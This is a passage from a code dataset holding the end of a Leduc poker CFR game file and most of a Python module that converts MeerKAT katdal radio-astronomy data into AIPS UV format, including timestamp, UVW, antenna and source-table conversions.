Also plays any chance actions.\n\t\tReturns the player to play and the information set they are in.\n\t\tIf action is None, then play uniformly at random among available actions.\n\t\t\"\"\"\n\t\tif action is None:\n\t\t\tavailable_actions = LeducCFR.available_actions(self.history)\n\t\t\taction = np.random.choice(available_actions)\n\t\tassert action in LeducCFR.available_actions(self.history)\n\t\tself.history.append(action)\n\n\t\tif LeducCFR.is_terminal(self.history):\n\t\t\tterminal = True\n\t\t\tpayoffs = LeducCFR.payoffs(self.history)\n\t\t\tplayer = None\n\t\t\tinformation_set = None\n\t\telse:\n\t\t\t# Play any chance actions\n\t\t\twhile LeducCFR.which_player(self.history) == 0:\n\t\t\t\tself.history.append(LeducCFR.sample_chance_action(self.history))\n\t\t\t\t\n\t\t\tterminal = False\n\t\t\tpayoffs = None\n\t\t\tplayer = LeducCFR.which_player(self.history)\n\t\t\tinformation_set = LeducCFR.information_set(self.history)\n\n\t\treturn player, information_set, terminal, payoffs","sub_path":"regretmatching/leduc_cfr_game.py","file_name":"leduc_cfr_game.py","file_ext":"py","file_size_in_byte":13395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94870360","text":"from collections import Counter\nimport datetime\nimport logging\nimport time\n\nimport attr\nimport numba\nimport numpy as np\nimport dask.array as da\n\nimport UVDesc\n\nfrom katacomb import AIPSPath, normalise_target_name\nfrom katacomb.util import fmt_bytes\n\nfrom katdal.lazy_indexer import DaskLazyIndexer, dask_getitem\n\nlog = logging.getLogger('katacomb')\n\nONE_DAY_IN_SECONDS = 24*60*60.0\nMAX_AIPS_PATH_LEN = 12\nLIGHTSPEED = 299792458.0\n\n\"\"\" Map correlation characters to correlation id \"\"\"\nCORR_ID_MAP = {('h', 'h'): 0,\n ('v', 'v'): 1,\n ('h', 'v'): 2,\n ('v', 'h'): 3}\n\n\ndef aips_timestamps(timestamps, midnight):\n \"\"\"\n Given katdal timestamps and midnight on the observation date in UTC,\n calculates the Julian Day offset from midnight on the observation date.\n\n Parameters\n ----------\n timestamps : np.ndarray\n katdal UTC timestamps\n midnight : float\n midnight on day of observation in UTC\n\n Returns\n -------\n np.ndarray\n AIPS Julian Day timestamps, offset from midnight on the\n observation date.\n \"\"\"\n return (timestamps - midnight) / ONE_DAY_IN_SECONDS\n\n\ndef katdal_timestamps(timestamps, midnight):\n \"\"\"\n Given AIPS Julian day timestamps offset from midnight on the day\n of the observation, calculates the katdal UTC timestamps\n\n Parameters\n ----------\n timestamps : np.ndarray\n AIPS Julian Day timestamps, offset from midnight on the\n observation date.\n midnight : float\n midnight on day of observation in UTC\n\n Returns\n -------\n np.ndarray\n katdal UTC timestamps\n \"\"\"\n return midnight + (timestamps * ONE_DAY_IN_SECONDS)\n\n\ndef katdal_ant_nr(ant_name):\n \"\"\"Get a unique integer corresponding to an antenna name.\n\n Given an antenna name of the form either 'mnnnp' or 'snnnnp'\n where 'm' or 's' is a character constant denoting 'MeerKAT'\n and 'SKA' dishes respectively, 'nnn' (or 'nnnn') is the\n antenna number and 'p' is the (optional) polarisation, returns\n an ordered antenna number as an integer.\n\n The ordered antenna number is defined as 'nnn' for MeerKAT\n dishes and 'nnnn + 64' for SKA dishes.\n\n Parameters\n ----------\n ant_name : str\n Antenna Name\n\n Returns\n ------\n integer\n antenna number in antenna name\n \"\"\"\n try:\n if ant_name[0] == 'm':\n nr = int(ant_name[1:4])\n elif 
ant_name[0] == 's':\n nr = int(ant_name[1:5]) + 64\n else:\n raise ValueError\n except (ValueError, IndexError):\n raise ValueError(\"Invalid antenna name '%s'\" % ant_name)\n return nr\n\n\ndef aips_ant_nr(ant_name):\n \"\"\"Given antenna name get its AIPS antenna number.\n\n This is done by adding one to the result of\n :func:`katdal_ant_nr`.\n\n Parameters\n ----------\n ant_name : str\n Antenna Name\n\n Returns\n ------\n integer\n AIPS antenna number from antenna name\n \"\"\"\n return katdal_ant_nr(ant_name) + 1\n\n\ndef katdal_ant_name(aips_ant_nr):\n \"\"\"Return antenna name, given the AIPS antenna number\"\"\"\n if aips_ant_nr < 65:\n res = f'm{(aips_ant_nr-1):03d}'\n else:\n res = f's{(aips_ant_nr-65):04d}'\n return res\n\n\ndef aips_uvw(uvw, refwave):\n \"\"\"\n Converts katdal UVW coordinates in metres to AIPS UVW coordinates\n in wavelengths *at the reference frequency*.\n\n Notes\n -----\n Wavelengths at the reference frequency differ from AIPS documentation\n (AIPS Memo 117, Going AIPS, Obitdoc) which state that UVW coordinates\n should be in lightseconds.\n\n Parameters\n ----------\n uvw : np.ndarray\n katdal UVW coordinates in metres\n refwave : float\n Reference wavelength in metres\n\n Returns\n -------\n np.ndarray\n AIPS UVW coordinates in wavelengths at the reference frequency\n \"\"\"\n return uvw / refwave\n\n\ndef katdal_uvw(uvw, refwave):\n \"\"\"\n Converts AIPS UVW coordinates in wavelengths *at the reference frequency*\n to katdal UVW coordinates in metres. See :function:`aips_uvw` for\n further discussion.\n\n Parameters\n ----------\n uvw : np.ndarray\n AIPS UVW coordinates in wavelengths at the reference frequency\n refwave : float\n Reference wavelength in metres\n\n Returns\n -------\n np.ndarray\n katdal UVW coordinates, in metres\n \"\"\"\n return refwave * uvw\n\n\ndef aips_source_name(name, used=None):\n \"\"\"\n Truncates to MAX_AIPS_PATH_LEN, padding with spaces and appending\n repeat number to repeat names.\n \"\"\"\n # Avoid a shared mutable default argument\n if used is None:\n used = []\n return normalise_target_name(name, used, max_length=MAX_AIPS_PATH_LEN)\n\n\ndef aips_catalogue(katdata, nif):\n \"\"\"\n Creates a catalogue of AIPS sources from :attribute:`katdata.catalogue`.\n It resembles :attribute:`katdal.Dataset.catalogue`.\n\n Returns a list of dictionaries following the specification\n of the AIPS SU table in AIPS Memo 117.\n\n Notes\n -----\n At present, the following is set for each source:\n\n 1. AIPS Source ID\n 2. Source name\n 3. Source position\n\n Other quantities such as:\n\n 1. Flux\n 2. Frequency Offset\n 3. Rest Frequency\n 4. Bandwidth\n\n are defaulted to zero for now as these are not strictly required for\n the purposes of the continuum pipeline. 
See Bill Cotton's description\n of parameter and why it is unnecessary above each row entry in the code.\n\n Relevant keys ('[IQUV]FLUX', 'LSRVEL', 'FREQOFF', 'RESTREQ') are repeated\n `nif` times to allow equal subdivision of the band into IFs.\n\n Parameters\n ----------\n katdata : :class:`katdal.Dataset`\n katdal object\n nif : int\n Number of IFs to split band into\n\n Returns\n -------\n list of dicts\n List of dictionaries where each dictionary defines an AIPS source.\n\n \"\"\"\n catalogue = []\n\n zero = np.asarray([0.0, 0.0])\n\n used = []\n\n for aips_i, t in enumerate(katdata.catalogue.targets, 1):\n # Nothings have no position!\n if \"Nothing\" == t.name:\n radec = zero\n aradec = zero\n else:\n radec = t.radec()\n aradec = t.apparent_radec()\n\n # Right Ascension and Declination\n ra, dec = np.rad2deg(radec)\n # Apparent position\n raa, deca = np.rad2deg(aradec)\n\n source_name = aips_source_name(t.name, used)\n\n aips_source_data = {\n # Fill in data derived from katpoint target\n 'ID. NO.': [aips_i],\n # SOURCE keyword requires 16 characters.\n 'SOURCE': [source_name.ljust(16, ' ')],\n 'RAEPO': [ra],\n 'DECEPO': [dec],\n 'RAOBS': [raa],\n 'DECOBS': [deca],\n 'RAAPP': [raa],\n 'DECAPP': [deca],\n 'EPOCH': [2000.0],\n\n # NOTE(bcotton)\n # CALCODE - is used to distinguish type and usage of calibrator\n # source and is used to carry intent from the scheduling process,\n # e.g. this is a bandpass calibrator.\n # Since this data will likely never be used to derive the\n # external calibration, it is unlikely to ever be used.\n 'CALCODE': [' ' * 4], # 4 spaces for calibrator code\n\n # Following seven key-values technically vary by\n # spectral window, but we're only handling one SPW\n # at a time so it doesn't matter\n\n # NOTE(bcotton)\n # I/Q/U/VFLUX are the flux densities, per spectral window,\n # either determined from a standard model or derived in the\n # calibration process from a standard calibrator.\n # Since this data will likely never be used to derive the\n # external calibration, they are unlikely to ever be used.\n 'IFLUX': [0.0] * nif,\n 'QFLUX': [0.0] * nif,\n 'VFLUX': [0.0] * nif,\n 'UFLUX': [0.0] * nif,\n\n # NOTE(bcotton)\n # LSRVEL, FREQOFF,RESTFREQ are used in making Doppler corrections\n # for the Earth's motion. Since MeerKAT data can, in principle\n # include both HI and OH lines (separate spectral windows?)\n # the usage may be complicated. Look at the documentation for\n # either Obit/CVel or AIPS/CVEL for more details on usage.\n # I'm not sure how the Doppler corrections will be made but\n # likely not on the data in question. In practice, for\n # NRAO related telescopes this information is not reliable\n # and can be supplied as parameters to the correction software.\n # There are only a handful of transition available to MeerKAT\n # which all have very well known rest frequencies.\n # I don't know if MeerKAT plans online Doppler tracking which\n # I think is a bad idea anyway.\n 'LSRVEL': [0.0] * nif, # Velocity\n 'FREQOFF': [0.0] * nif, # Frequency Offset\n 'RESTFREQ': [0.0] * nif, # Rest Frequency\n\n # NOTE(bcotton)\n # BANDWIDTH was probably a mistake although, in principle,\n # it can be used to override the value in the FQ table.\n # I'm not sure if anything actually uses this.\n 'BANDWIDTH': [0.0], # Bandwidth of the SPW\n\n # NOTE(bcotton)\n # PMRA, PMDEC are the proper motions of Galactic or extragalactic\n # objects. 
These are a rather muddled implementation as they also\n # need both equinox and epoch of the standard position, which for\n # Hipparcos positions are different. In practice, these are usually\n # included in the apparent position of date. I can't see these ever\n # being useful for MeerKAT as they are never more than a few mas/yr.\n # There is a separate Planetary Ephemeris (PO) table for solar\n # system objects which may be needed for the Sun or planets\n # (a whole different bucket of worms).\n 'PMRA': [0.0], # Proper Motion in Right Ascension\n 'PMDEC': [0.0], # Proper Motion in Declination\n\n # NOTE(bcotton)\n # QUAL can be used to subdivide data for a given \"SOURCE\"\n # (say for a mosaic). \"SOURCE\" plus \"QUAL\" uniquely define\n # an entry in the table. The MeerKAT field of view is SO HUGE\n # I can't see this being needed.\n 'QUAL': [0], # Source Qualifier Number\n }\n\n used.append(source_name)\n\n catalogue.append(aips_source_data)\n\n return catalogue\n\n\nMEERKAT = 'MeerKAT'\n\n\nclass _KatdalTransformer(object):\n \"\"\"\n Small wrapper around a katdal data attribute.\n\n Performs two functions:\n\n 1. Transforms katdal data into AIPS format\n 2. Implements __getitem__ to proxy indexing calls\n to the underlying katdal data attribute.\n\n Basic idea is as follows:\n\n .. code-block:: python\n\n def __init__(self, ...):\n time_xform = lambda idx: (K.timestamps[idx] - midnight) / 86400.0\n self._time_xformer = _KatdalTransformer(time_xform,\n shape=lambda: K.timestamps.shape,\n dtype=K.timestamps.dtype)\n\n @property\n def timestamps(self):\n return self._time_xformer\n \"\"\"\n def __init__(self, transform, shape, dtype):\n self._transform = transform\n self._shape = shape\n self._dtype = dtype\n\n def __getitem__(self, index):\n return self._transform(index)\n\n @property\n def shape(self):\n return self._shape()\n\n @property\n def dtype(self):\n return self._dtype\n\n def __len__(self):\n return self.shape[0]\n\n\nclass KatdalAdapter(object):\n \"\"\"\n Adapts a :class:`katdal.DataSet` to look\n a bit more like a UV file.\n\n This is not a true adapter, but perhaps if\n called that enough, it will become one.\n \"\"\"\n\n def __init__(self, katds):\n \"\"\"\n Constructs a KatdalAdapter.\n\n Parameters\n ----------\n katds : :class:`katdal.DataSet`\n An opened katdal dataset.\n \"\"\"\n self._katds = katds\n self._cache = {}\n self._nif = 1\n self._catalogue = aips_catalogue(katds, self._nif)\n\n def _vis_xformer(index):\n \"\"\"\n Transform katdal visibilities indexed by ``index``\n into AIPS visibilities.\n \"\"\"\n if isinstance(self._katds.vis, DaskLazyIndexer):\n arrays = [self._katds.vis, self._katds.weights, self._katds.flags]\n vis, weights, flags = [dask_getitem(array.dataset, np.s_[index, :, :])\n for array in arrays]\n else:\n vis = da.from_array(self._katds.vis[index])\n weights = da.from_array(self._katds.weights[index])\n flags = da.from_array(self._katds.flags[index])\n # Apply flags by negating weights\n weights = da.where(flags, -32767.0, weights)\n # Split complex vis dtype into real and imaginary parts\n vis_dtype = vis.dtype.type(0).real.dtype\n vis = vis.view(vis_dtype).reshape(vis.shape + (2,))\n out_array = np.empty(weights.shape + (3,), dtype=vis_dtype)\n da.store([vis, weights], 
[out_array[..., 0:2], out_array[..., 2]], lock=False)\n return out_array\n\n def _time_xformer(index):\n \"\"\"\n Transform katdal timestamps indexed by ``index``\n into AIPS timestamps. These are the Julian days\n since midnight on the observation date.\n \"\"\"\n return aips_timestamps(self._katds.timestamps[index], self.midnight)\n\n # Convert katdal UVW into AIPS UVW\n def _u_xformer(i): return aips_uvw(self._katds.u[i], self.refwave)\n\n def _v_xformer(i): return aips_uvw(self._katds.v[i], self.refwave)\n\n def _w_xformer(i): return aips_uvw(self._katds.w[i], self.refwave)\n\n # Set up the actual transformers\n self._vis_xformer = _KatdalTransformer(_vis_xformer,\n shape=lambda: self._katds.vis.shape,\n dtype=self._katds.weights.dtype)\n\n self._time_xformer = _KatdalTransformer(_time_xformer,\n shape=lambda: self._katds.timestamps.shape,\n dtype=self._katds.timestamps.dtype)\n\n self._u_xformer = _KatdalTransformer(_u_xformer,\n shape=lambda: self._katds.u.shape,\n dtype=self._katds.u.dtype)\n self._v_xformer = _KatdalTransformer(_v_xformer,\n shape=lambda: self._katds.u.shape,\n dtype=self._katds.u.dtype)\n self._w_xformer = _KatdalTransformer(_w_xformer,\n shape=lambda: self._katds.u.shape,\n dtype=self._katds.u.dtype)\n\n @property\n def uv_timestamps(self):\n \"\"\" Returns times in Julian days since midnight on the Observation Date \"\"\"\n return self._time_xformer\n\n @property\n def uv_vis(self):\n \"\"\" Returns AIPS visibilities \"\"\"\n return self._vis_xformer\n\n @property\n def uv_u(self):\n \"\"\" U coordinate in wavelengths at the reference frequency \"\"\"\n return self._u_xformer\n\n @property\n def uv_v(self):\n \"\"\" V coordinate in wavelengths at the reference frequency \"\"\"\n return self._v_xformer\n\n @property\n def uv_w(self):\n \"\"\" W coordinate in wavelengths at the reference frequency \"\"\"\n return self._w_xformer\n\n def scans(self):\n \"\"\"\n Generator iterating through scans in an observation.\n Proxies :meth:`katdal.Dataset.scans`.\n\n Yields\n ------\n scan_index : int\n Scan index\n state : str\n State\n aips_source : dict\n AIPS Source\n\n \"\"\"\n for si, state, target in self._katds.scans():\n yield si, state, self._catalogue[self.target_indices[0]]\n\n def aips_path(self, **kwargs):\n \"\"\"\n Constructs an AIPS path from a :class:`KatdalAdapter`\n\n Parameters\n ----------\n **kwargs (optional): :obj:\n See :class:`AIPSPath` for information on\n keyword arguments.\n\n Returns\n -------\n :class:`AIPSPath`\n AIPS path describing this observation\n \"\"\"\n name = kwargs.pop('name', None)\n dtype = kwargs.get('dtype', \"AIPS\")\n\n if name is None:\n name = self._katds.obs_params.get('capture_block_id',\n self._katds.experiment_id)\n if dtype == 'AIPS':\n name = name[-MAX_AIPS_PATH_LEN:]\n elif dtype == \"FITS\":\n name += '.uvfits'\n else:\n raise ValueError('Invalid dtype %s' % dtype)\n\n return AIPSPath(name=name, **kwargs)\n\n def select(self, **kwargs):\n \"\"\"\n Proxies :meth:`katdal.select` and adds optional `nif` selection.\n\n Parameters\n ----------\n nif (optional): int\n Number of AIPSish IFs of equal frequency width to split the band into.\n **kwargs (optional): dict\n :meth:`katdal.select` arguments. 
See katdal documentation for information\n \"\"\"\n nif = kwargs.pop('nif', self.nif)\n result = self._katds.select(**kwargs)\n # Make sure any possible new channel range in selection is permitted\n self.nif = nif\n return result\n\n @property\n def size(self):\n return self._katds.size\n\n @property\n def shape(self):\n \"\"\" Proxies :meth:`katdal.DataSet.shape` \"\"\"\n return self._katds.shape\n\n @property\n def catalogue(self):\n \"\"\"\n AIPS source catalogue, resembling\n :attribute:`katdal.Dataset.catalogue`.\n \"\"\"\n return self._catalogue\n\n @property\n def scan_indices(self):\n \"\"\" Proxies :attr:`katdal.DataSet.scan_indices` \"\"\"\n return self._katds.scan_indices\n\n @property\n def target_indices(self):\n \"\"\" Proxies :attr:`katdal.DataSet.target_indices` \"\"\"\n return self._katds.target_indices\n\n @property\n def name(self):\n \"\"\" Proxies :attr:`katdal.DataSet.name` \"\"\"\n return self._katds.name\n\n @property\n def experiment_id(self):\n \"\"\" Proxies :attr:`katdal.DataSet.name` \"\"\"\n return self._katds.experiment_id\n\n @property\n def observer(self):\n \"\"\" Proxies :attr:`katdal.DataSet.observer` \"\"\"\n return self._katds.observer\n\n @property\n def description(self):\n \"\"\" Proxies :attr:`katdal.DataSet.description` \"\"\"\n return self._katds.description\n\n @property\n def version(self):\n \"\"\" Proxies :attr:`katdal.DataSet.version` \"\"\"\n return self._katds.version\n\n @property\n def katdal(self):\n \"\"\" The `katdal.DataSet` adapted by this object \"\"\"\n return self._katds\n\n @property\n def obsdat(self):\n \"\"\"\n Returns\n -------\n str\n The observation date\n \"\"\"\n start = time.gmtime(self._katds.start_time.secs)\n return time.strftime('%Y-%m-%d', start)\n\n @property\n def midnight(self):\n \"\"\"\n Returns\n -------\n float\n Midnight on the observation date in unix seconds\n \"\"\"\n return time.mktime(time.strptime(self.obsdat, '%Y-%m-%d'))\n\n @property\n def today(self):\n \"\"\"\n Returns\n -------\n str\n The current date\n \"\"\"\n return datetime.date.today().strftime('%Y-%m-%d')\n\n @property\n def obs_params(self):\n \"\"\" Proxies :attr:`katdal.DataSet.obs_params` \"\"\"\n return getattr(self._katds, 'obs_params', {})\n\n def correlator_products(self):\n \"\"\"\n Returns\n -------\n list\n CorrelatorProduct(antenna1, antenna2, correlator_product_id)\n objects, with the correlator_product_id mapped as follows:\n\n .. code-block:: python\n\n { ('h','h'): 0,\n ('v','v'): 1,\n ('h','v'): 2,\n ('v','h'): 3 }\n \"\"\"\n class CorrelatorProduct(object):\n def __init__(self, ant1, ant2, cid):\n self.ant1 = ant1\n self.ant2 = ant2\n self.cid = cid\n\n @property\n def ant1_ix(self):\n return katdal_ant_nr(self.ant1.name)\n\n @property\n def ant2_ix(self):\n return katdal_ant_nr(self.ant2.name)\n\n @property\n def aips_ant1_ix(self):\n return aips_ant_nr(self.ant1.name)\n\n @property\n def aips_ant2_ix(self):\n return aips_ant_nr(self.ant2.name)\n\n @property\n def aips_bl_ix(self):\n \"\"\" This produces the AIPS baseline index random parameter \"\"\"\n return self.aips_ant1_ix * 256.0 + self.aips_ant2_ix\n\n # { name : antenna } mapping\n antenna_map = {a.name: a for a in self._katds.ants}\n products = []\n\n for a1_corr, a2_corr in self._katds.corr_products:\n # These can look like 'm008v', 'm016h' etc. for MeerKAT\n # or 's0008v', 's0018h' etc. 
for SKA.\n # Separate into name 'm008' and polarisation 'v'.\n a1_name = a1_corr[:-1]\n a1_type = a1_corr[-1:].lower()\n\n a2_name = a2_corr[:-1]\n a2_type = a2_corr[-1:].lower()\n\n # Derive the correlation id\n try:\n cid = CORR_ID_MAP[(a1_type, a2_type)]\n except KeyError:\n raise ValueError(\"Invalid Correlator Product \"\n \"['%s', '%s']\" % (a1_corr, a2_corr))\n\n # Look up katdal antenna pair\n a1 = antenna_map[a1_name]\n a2 = antenna_map[a2_name]\n\n products.append(CorrelatorProduct(a1, a2, cid))\n\n return products\n\n @property\n def nstokes(self):\n \"\"\"\n Returns\n -------\n int\n The number of stokes parameters in this observation,\n derived from the number of times we see a\n pair of antenna names in the correlation products.\n \"\"\"\n\n # Count the number of times we see a correlation product\n counts = Counter((cp.ant1_ix, cp.ant2_ix) for cp\n in self.correlator_products())\n return max(counts.values())\n\n @property\n def nchan(self):\n \"\"\"\n Returns\n -------\n int\n The number of channels in this observation.\n \"\"\"\n return len(self._katds.channel_freqs)\n\n @property\n def frqsel(self):\n \"\"\"\n The selected spectral window (FORTRAN-index)\n\n .. code-block:: python\n\n KA = KatdalAdapter(katdal.open('...'))\n assert KA.frqsel == 1\n\n Returns\n -------\n int\n The selected spectral window\n \"\"\"\n return self._katds.spw + 1\n\n @property\n def nif(self):\n \"\"\"\n The number of spectral windows to use in the AIPS uv\n data. Must equally subdivide the number of frequency channels\n currently selected.\n\n Returns\n -------\n int\n The number of spectral windows\n \"\"\"\n return self._nif\n\n @nif.setter\n def nif(self, numif):\n if self.nchan % numif != 0:\n raise ValueError('Number of requested IFs (%d) does not divide number of channels (%d)'\n % (numif, self.nchan))\n else:\n self._nif = numif\n self._catalogue = aips_catalogue(self._katds, numif)\n\n @property\n def channel_freqs(self):\n \"\"\"\n Returns\n -------\n list or np.ndarray\n List of channel frequencies\n \"\"\"\n return self._katds.channel_freqs\n\n @property\n def chinc(self):\n \"\"\"\n Returns\n -------\n float\n The channel increment, or width.\n \"\"\"\n return self._katds.channel_width\n\n @property\n def reffreq(self):\n \"\"\"\n Returns\n -------\n float\n The first channel frequency as the reference frequency,\n rather than the centre frequency. 
See `uv_format.rst`.\n \"\"\"\n return self._katds.channel_freqs[0]\n\n @property\n def refwave(self):\n \"\"\"\n Returns\n -------\n float\n Reference wavelength in metres\n \"\"\"\n return LIGHTSPEED / self.reffreq\n\n @property\n def uv_antenna_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS AN\n antenna table keywords.\n \"\"\"\n\n julian_date = UVDesc.PDate2JD(self.obsdat)\n\n return {\n 'ARRNAM': MEERKAT,\n 'FREQ': self.reffreq, # Reference frequency\n 'FREQID': self.frqsel, # Frequency setup id\n 'RDATE': self.obsdat, # Reference date\n 'NO_IF': self.nif, # Number of spectral windows\n # GST at 0h on reference data in degrees\n 'GSTIA0': UVDesc.GST0(julian_date) * 15.0,\n # Earth's rotation rate (degrees/day)\n 'DEGPDY': UVDesc.ERate(julian_date) * 360.0,\n }\n\n @property\n def uv_antenna_rows(self):\n \"\"\"\n Returns\n -------\n list\n List of dictionaries describing each antenna.\n \"\"\"\n\n return [{\n # MeerKAT antenna information\n 'NOSTA': [aips_ant_nr(a.name)],\n 'ANNAME': [a.name],\n 'STABXYZ': list(a.position_ecef),\n 'DIAMETER': [a.diameter],\n 'POLAA': [90.0],\n\n # Defaults for the rest\n 'POLAB': [0.0],\n 'POLCALA': [0.0, 0.0] * self.nif,\n 'POLCALB': [0.0, 0.0] * self.nif,\n 'POLTYA': ['X'],\n 'POLTYB': ['Y'],\n 'STAXOF': [0.0],\n 'BEAMFWHM': [0.0] * self.nif,\n 'ORBPARM': [],\n 'MNTSTA': [0]\n } for a in sorted(self._katds.ants)]\n\n @property\n def uv_source_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS SU\n source table keywords.\n \"\"\"\n return {\n 'NO_IF': self.nif, # Number of spectral windows\n 'FREQID': self.frqsel, # Frequency setup ID\n 'VELDEF': 'RADIO', # Radio/Optical Velocity?\n # Velocity Frame of Reference (LSR is default)\n 'VELTYP': 'LSR'\n }\n\n @property\n def uv_source_rows(self):\n \"\"\"\n Returns\n -------\n list\n List of dictionaries describing sources.\n \"\"\"\n return [self._catalogue[ti] for ti in self._katds.target_indices]\n\n @property\n def uv_spw_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS FQ\n frequency table keywords.\n \"\"\"\n return {'NO_IF': self.nif}\n\n @property\n def max_antenna_number(self):\n \"\"\"\n Returns\n -------\n integer\n The maximum AIPS antenna number\n \"\"\"\n return max(r['NOSTA'][0] for r in self.uv_antenna_rows)\n\n @property\n def uv_calibration_keywords(self):\n \"\"\"\n Returns\n -------\n dict\n Dictionary containing updates to the AIPS CL\n calibration table keywords.\n \"\"\"\n return {\n 'NO_IF': self.nif,\n 'NO_POL': self.nstokes,\n 'NO_ANT': self.max_antenna_number,\n 'NO_TERM': 1,\n 'MFMOD': 1\n }\n\n @property\n def uv_spw_rows(self):\n \"\"\"\n Returns\n -------\n list\n List of dictionaries describing each\n spectral window.\n \"\"\"\n\n spw = self._katds.spectral_windows[self._katds.spw]\n bandwidth = abs(self.chinc) * self.nchan / self.nif\n\n return [{\n # Fill in data from MeerKAT spectral window\n 'FRQSEL': [self.frqsel], # Frequency setup ID\n 'IF FREQ': [if_num * bandwidth for if_num in range(self.nif)],\n 'CH WIDTH': [self.chinc] * self.nif,\n # Should be 'BANDCODE' according to AIPS MEMO 117!\n 'RXCODE': [spw.band],\n 'SIDEBAND': [spw.sideband] * self.nif,\n 'TOTAL BANDWIDTH': [bandwidth] * self.nif,\n }]\n\n def fits_descriptor(self):\n \"\"\" FITS visibility descriptor setup \"\"\"\n\n nstokes = self.nstokes\n # Set STOKES CRVAL according to AIPS Memo 117\n # { RR: -1.0, LL: -2.0, RL: -3.0, LR: -4.0,\n # XX: -5.0, YY: -6.0, XY: 
-7.0, YX: -8.0,\n # I: 1, Q: 2, U: 3, V: 4 }\n stokes_crval = 1.0 if nstokes == 1 else -5.0\n stokes_cdelt = -1.0 # cdelt is always -1.0\n\n return {\n 'naxis': 6,\n 'ctype': ['COMPLEX', 'STOKES', 'FREQ', 'IF', 'RA', 'DEC'],\n 'inaxes': [3, self.nstokes, self.nchan // self.nif, self.nif, 1, 1],\n 'cdelt': [1.0, stokes_cdelt, self.chinc, 1.0, 0.0, 0.0],\n 'crval': [1.0, stokes_crval, self.reffreq, 1.0, 0.0, 0.0],\n 'crpix': [1.0, 1.0, 1.0, 1.0, 1.0, 1.0],\n 'crota': [0.0, 0.0, 0.0, 0.0, 0.0, 0.0],\n }\n\n def default_table_cmds(self):\n \"\"\"\n Returns\n -------\n dict\n \"\"\"\n return {\n \"AIPS AN\": {\n \"attach\": {'version': 1, 'numIF': self.nif},\n \"keywords\": self.uv_antenna_keywords,\n \"rows\": self.uv_antenna_rows,\n \"write\": True,\n },\n \"AIPS FQ\": {\n \"attach\": {'version': 1, 'numIF': self.nif},\n \"keywords\": self.uv_spw_keywords,\n \"rows\": self.uv_spw_rows,\n \"write\": True,\n },\n \"AIPS SU\": {\n \"attach\": {'version': 1, 'numIF': self.nif},\n \"keywords\": self.uv_source_keywords,\n \"rows\": self.uv_source_rows,\n \"write\": True,\n },\n \"AIPS NX\": {\n \"attach\": {'version': 1},\n },\n }\n\n def uv_descriptor(self):\n \"\"\"\n Returns\n -------\n dict\n UV descriptor dictionary, derived from the metadata\n of a katdal file. Suitable for merging into a UVDesc dictionary\n when creating a new AIPS UV data file.\n \"\"\"\n\n # FITS descriptor is the base for our uv_descriptor\n desc = self.fits_descriptor()\n\n desc.update({\n # Observation\n 'obsdat': self.obsdat,\n 'observer': self.observer,\n 'origin': 'katdal export',\n 'JDObs': UVDesc.PDate2JD(self.obsdat),\n 'date': self.today,\n 'epoch': 2000.0,\n 'equinox': 2000.0,\n 'teles': MEERKAT,\n 'instrume': self._katds.spectral_windows[self._katds.spw].product,\n\n 'isort': 'TB', # Time, Baseline sort order\n 'object': 'MULTI', # Source, this implies multiple sources\n\n 'nvis': 0,\n 'firstVis': 0,\n 'numVisBuff': 0,\n\n # These are automatically calculated, but\n # are left here for illustration\n # 'incs' : 3, # Stokes 1D increment. 
3 floats in COMPLEX\n # 'incf' : 12, # Frequency 1D increment, 12 = 3*4 STOKES\n # 'incif' : 49152, # Spectral window 1D increment\n # # 49152 = 3*4*4096 CHANNELS\n\n # Regular parameter indices into ctypes/inaxes/cdelt etc.\n 'jlocc': 0, # COMPLEX\n 'jlocs': 1, # SOURCES\n 'jlocf': 2, # FREQ\n 'jlocif': 3, # IF\n 'jlocr': 4, # RA\n 'jlocd': 5, # DEC\n })\n\n # Random parameter keys, indices and coordinate systems\n # index == -1 indicates its absence in the Visibility Buffer\n RP = attr.make_class(\"RandomParameters\", [\"key\", \"index\", \"type\"])\n\n random_parameters = [\n RP('ilocu', 0, 'UU-L-SIN'), # U Coordinate\n RP('ilocv', 1, 'VV-L-SIN'), # V Coordinate\n RP('ilocw', 2, 'WW-L-SIN'), # W Coordinate\n RP('ilocb', 3, 'BASELINE'), # Baseline ID\n RP('iloct', 4, 'TIME1'), # Timestamp\n RP('iloscu', 5, 'SOURCE'), # Source Index\n\n RP('ilocfq', -1, 'FREQSEL'), # Frequency setup ID\n RP('ilocit', -1, 'INTTIM'), # Integration Time\n RP('ilocid', -1, 'CORR-ID'), # VLBA-specific\n RP('ilocws', -1, 'WEIGHT'), # Ignore\n\n # The following used when 'BASELINE' id\n # can't be calculated because number of antennas > 255\n RP('iloca1', -1, 'ANTENNA1'),\n RP('iloca2', -1, 'ANTENNA2'),\n RP('ilocsa', -1, 'SUBARRAY'),\n ]\n\n # Construct parameter types for existent random parameters\n ptype = [rp.type for rp in random_parameters if rp.index != -1]\n\n # Update with random parameters\n desc.update({rp.key: rp.index for rp in random_parameters})\n desc.update({'nrparm': len(ptype), 'ptype': ptype})\n\n return desc\n\n\ndef time_chunked_scans(kat_adapter, time_step=4):\n \"\"\"\n Generator returning visibility data for each scan, chunked\n along the time dimension in chunks of ``time_step``.\n Internally, this iterates through :code:`kat_adapter.scans()`\n to produce a :code:`(si, state, source, data_gen)` tuple,\n where :code:`si` is the scan index, :code:`state` the state\n of the scan and :code:`source` the AIPS source dictionary.\n :code:`data_gen` is itself a generator that yields\n :code:`time_step` chunks of the data.\n\n Parameters\n ----------\n kat_adapter : `KatdalAdapter`\n Katdal Adapter\n time_step : integer\n Size of time chunks (Default 4).\n 4 timesteps x 1024 channels x 2016 baselines x 4 stokes x 12 bytes\n works out to about 0.5 GB.\n\n Yields\n ------\n si : int\n Scan index\n state : str\n Scan state\n aips_source : dict\n Dictionary describing AIPS source\n data_gen : generator\n Generator yielding (u, v, w, time, baseline_index, visibilities)\n where :code:`len(time) <= time_step`\n \"\"\"\n cp = kat_adapter.correlator_products()\n nstokes = kat_adapter.nstokes\n\n # Lexicographically sort correlation products on (a1, a2, cid)\n def sort_fn(x): return (cp[x].ant1_ix, cp[x].ant2_ix, cp[x].cid)\n\n cp_argsort = np.asarray(sorted(range(len(cp)), key=sort_fn))\n corr_products = np.asarray([cp[i] for i in cp_argsort])\n\n # Use first stokes parameter index of each baseline\n bl_argsort = 